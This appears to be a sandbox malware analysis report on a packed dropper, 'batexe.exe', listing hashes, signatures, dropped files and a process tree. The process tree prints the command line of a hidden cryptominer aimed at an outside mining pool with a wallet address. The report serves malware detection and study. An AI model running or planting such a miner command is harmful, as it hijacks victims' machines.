73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22-02-2024 03:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4248	b2e.exe
3832	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3832	cpuminer-sse2.exe
3832	cpuminer-sse2.exe
3832	cpuminer-sse2.exe
3832	cpuminer-sse2.exe
3832	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2108-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 4248	2108	batexe.exe	86
PID 2108 wrote to memory of 4248	2108	batexe.exe	86
PID 2108 wrote to memory of 4248	2108	batexe.exe	86
PID 4248 wrote to memory of 2848	4248	b2e.exe	88
PID 4248 wrote to memory of 2848	4248	b2e.exe	88
PID 4248 wrote to memory of 2848	4248	b2e.exe	88
PID 2848 wrote to memory of 3832	2848	cmd.exe	90
PID 2848 wrote to memory of 3832	2848	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5EE9.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe

Filesize
5.8MB

MD5
3e1013b404e151ba6db0005cccb8c0a9

SHA1
391fd36ed9cf6d51faabae5ae796d497b222567b

SHA256
021a7a4bdaab52398a87cd5a0e332386ea2e0411a8fe00d777ef87b8f9cdd2ac

SHA512
27fb3f1c5530b91bb903c4768861f67220ad44a44224c8bc0cd0601f6873afcc94586514be4aeb5f8763c0ecbfa7b365a9f55eeccf0968df907c1d5a7b47bc59

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe

Filesize
1.0MB

MD5
87ce2d0648e07c898a775301521a6443

SHA1
c8f91e52f59a2a47205511340b08b4c8b4a5363d

SHA256
58a0f68d719e0186d3212b88acb2d262e2f7c1c036b25c917733cc2f169c08f1

SHA512
bee404a25ce76eae403b1db1e87b0f7a98f1d4122c475b9de62704b97d06f600277b99fa236a56ee6b04ee634f181ac59345620ba4aa3fbd0b9f84e5cbacef6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe

Filesize
256KB

MD5
18c91665349cf71648d4af5d21843ea9

SHA1
6be582f8587a42e96d73bf174cb6d6345761c192

SHA256
979d6a944f61f2cde2dea724ce5e0297005602c15fbbbcb917540ec1b1f3f937

SHA512
544d110b9bde470b9411a91f9195bf5e6914c1e5c59ec4485be08acaecd0e519d1c932181cf5a76d5241dedc362beb56f2fb407d808d554e43d408b34a621d48

Download Submit
C:\Users\Admin\AppData\Local\Temp\5EE9.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
954KB

MD5
640937f3375869e94fcc6f4c9f57109f

SHA1
f2637d43a19ac67dec5171cb0e5883bdc247cb83

SHA256
592c8954a7898a8c909341e0b9cd8aedf8d62b330466b3c5fb2151797a824470

SHA512
132452ea4e3640bb8a5f0583674daaa2a587a59037af351e9216440674c1c19f79b60336fc0583c76e34fa3744a04d710fe0d4c8b36ea4da6f21c611e8fbc429

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
674bbec6f987d7dea41b05e09756c2c4

SHA1
f52d7804d425339ec99434223db9be9724c334a3

SHA256
d549898dcbfbe2dfe05375016bf898e92c94bcbd6554725ca7c9ae656310ca6c

SHA512
3c79605490b220e869525fcc8a5dcdd01dc6a2b8140476b2c0984adf4578f797d23233ba322ced9169c1655cf72a215c003710d27037b4dca89bab29ba529aa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
710KB

MD5
4c3ed8c94df658d25da67c29e18765e8

SHA1
50218738d681f5711dc21efa8a7e14714bd9357f

SHA256
0f421943fa89c2e3d105b34dbceb058a6c4fd4cf757b3c40db732afe47add423

SHA512
e41f62c0848179d683b77bc4b6321b5647e05dda04d09b72bea74ab440a5b4bf4b4eb86d8adcc36f609fb26ceacaba6528fd73e4e4f4779896a38b31ff9227dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
b3dd9d062125e52cbce4fed41d83bc0e

SHA1
70c47906c503f4f31dfe6ea7fb2e96c7db28f5d7

SHA256
8185a86998c37fcac25468fffc98aecc511fe74fc613ce550e725a5b037f1be2

SHA512
d5a919e966e4492b36fd1866e9e0247350f7908deb53ebef5dfe853064d2a8f3281425771f140b006fe08f66ee614644097a448e4b3a34ccf0f905e8791b9810

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
45ecc00b328511ed04fa5a44310bd84e

SHA1
a58afa4f2f4044d3cc684929199060ea951f5d2f

SHA256
211536920d1b7cebd706223f75423b55e0ee70a4b12575d81b50f5a675297f43

SHA512
bedafd7ff3e9dbb03f7e88df495fd96ad3e4f8f2a9e685bdd219bd02810ce1b3fc61ed93196c96bc558a8f442b47f4f37a2fcc6a07bba82e66320bcf032ab14d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
1336d5937e18c45114118237255d3169

SHA1
a884c84818561794c8d30050285bfbea2bbfdf8d

SHA256
e9b02e4cdedd7b021f687ad724c111f359ad3953c39ddc106487a6c82dc6394f

SHA512
257bc4197dbb91de4f699c7ce18ee7959a85b64d7a51688f6c3d58ab7a09412655f24916d8f6d76856e9f6946088568f3d985e67a94cf09cde7d9a4e1718b4a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
888fc6f6ee8eb8a914d0b7221baf036a

SHA1
9f972c4e90ba42ecd83f93a86d6b9a53bee2a6bb

SHA256
766af690ea49cf785ca3650da286c1dd73ee24e6b55ef8a21d8d88a948910ed7

SHA512
2a08d36f0b1943d59b1b375df71c88939d4b5f1139fbed9070e0a15aa1fd0b2ef6e5245c69527933fbd940bb0dada83c52ffcbdb94b2094fb2e24c8e87039916

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
889KB

MD5
0b73dcaa50978162138313211db4d75a

SHA1
cf421b47d3a0d51144cfc60e6033b9d1786eed63

SHA256
14acf0bbbe62bb9092fb9298f3a13ecdf88d3285f3f1bc3baf367204911c34fa

SHA512
abdcf86d0116846cc99280ff7cf66cc173c4e37202ed17bafa18a8ecca1a4a5ad787bf5f0efe4206301818be52e40105b3e05e1fae546eda0213ee1e854b7d85

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2108-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3832-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3832-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-45-0x000000006DDE0000-0x000000006DE78000-memory.dmp

Filesize
608KB

Download
memory/3832-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3832-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-47-0x0000000001130000-0x00000000029E5000-memory.dmp

Filesize
24.7MB

Download
memory/3832-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3832-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4248-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4248-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download